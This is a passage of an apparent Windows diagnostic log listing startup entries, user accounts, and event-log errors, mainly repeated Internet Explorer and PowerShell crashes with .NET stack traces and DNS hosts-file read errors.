HKLM\...\StartupApproved\Run32: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "amd_dc_opt"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKCU\...\StartupApproved\Run: => "Skype"
HKCU\...\StartupApproved\Run: => "whatpulse"
HKCU\...\StartupApproved\Run: => "uTorrent"
HKCU\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKCU\...\StartupApproved\Run: => "Desura"
HKCU\...\StartupApproved\Run: => "MurGee.com Auto Clicker"
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-1557230296-4363482-4078292831-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1557230296-4363482-4078292831-1005 - Limited - Enabled)
Guest (S-1-5-21-1557230296-4363482-4078292831-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1557230296-4363482-4078292831-1004 - Limited - Enabled)
RaRWolf (S-1-5-21-1557230296-4363482-4078292831-1002 - Administrator - Enabled) => C:\Users\RaRWolf
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (10/23/2014 05:45:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x2364
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 05:35:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x6004
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 05:34:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x049438d0
Faulting process id: 0x3c34
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (10/23/2014 05:34:53 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (10/23/2014 05:33:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x048f38d0
Faulting process id: 0x4824
Faulting application start time: 0xpowershell.exe0
Faulting application path: powershell.exe1
Faulting module path: powershell.exe2
Report Id: powershell.exe3
Faulting package full name: powershell.exe4
Faulting package-relative application ID: powershell.exe5
 
Error: (10/23/2014 05:33:50 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()
 
Error: (10/23/2014 05:11:27 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: KERNELBASE.dll, version: 6.2.9200.16451, time stamp: 0x50988950
Exception code: 0x000006a6
Fault offset: 0x00014b32
Faulting process id: 0xec7c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 05:09:34 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x6128
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 04:49:55 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.16537, time stamp: 0x5010888a
Faulting module name: ntdll.dll, version: 6.2.9200.16578, time stamp: 0x515fac6e
Exception code: 0xc0000005
Fault offset: 0x000618d0
Faulting process id: 0x188e4
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3
Faulting package full name: iexplore.exe4
Faulting package-relative application ID: iexplore.exe5
 
Error: (10/23/2014 04:47:30 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: Steam.exe, version: 2.45.19.81, time stamp: 0x54457aa7
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc000041d
Fault offset: 0x04b1098c
Faulting process id: 0x2438
Faulting application start time: 0xSteam.exe0
Faulting application path: Steam.exe1
Faulting module path: Steam.exe2
Report Id: Steam.exe3
Faulting package full name: Steam.exe4
Faulting package-relative application ID: Steam.exe5
 
 
System errors:
=============
Error: (10/23/2014 06:30:10 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: A fatal alert was received from the remote endpoint. The TLS protocol defined fatal alert code is 40.
 
Error: (10/23/2014 06:29:48 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: A fatal alert was received from the remote endpoint. The TLS protocol defined fatal alert code is 40.
 
Error: (10/23/2014 05:46:27 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:26 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:25 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:18 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:18 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:17 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
Error: (10/23/2014 05:46:17 PM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: There was an error while attempting to read the local hosts file.
 
 
Microsoft Office Sessions:
=========================
Error: (10/23/2014 05:45:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0236401cfef0a39b5726fC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dlleda2960e-5afd-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:35:48 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe10.0.9200.165375010888antdll.dll6.2.9200.16578515fac6ec0000005000618d0600401cfef094bf7b762C:\Program Files\Internet Explorer\iexplore.exeC:\Windows\SYSTEM32\ntdll.dll8d4c699f-5afc-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:34:54 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1638450109cceunknown0.0.0.000000000c0000005049438d03c3401cfef092aab8955C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeunknown6cc9faca-5afc-11e4-bf1c-3085a9a720f7
 
Error: (10/23/2014 05:34:53 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
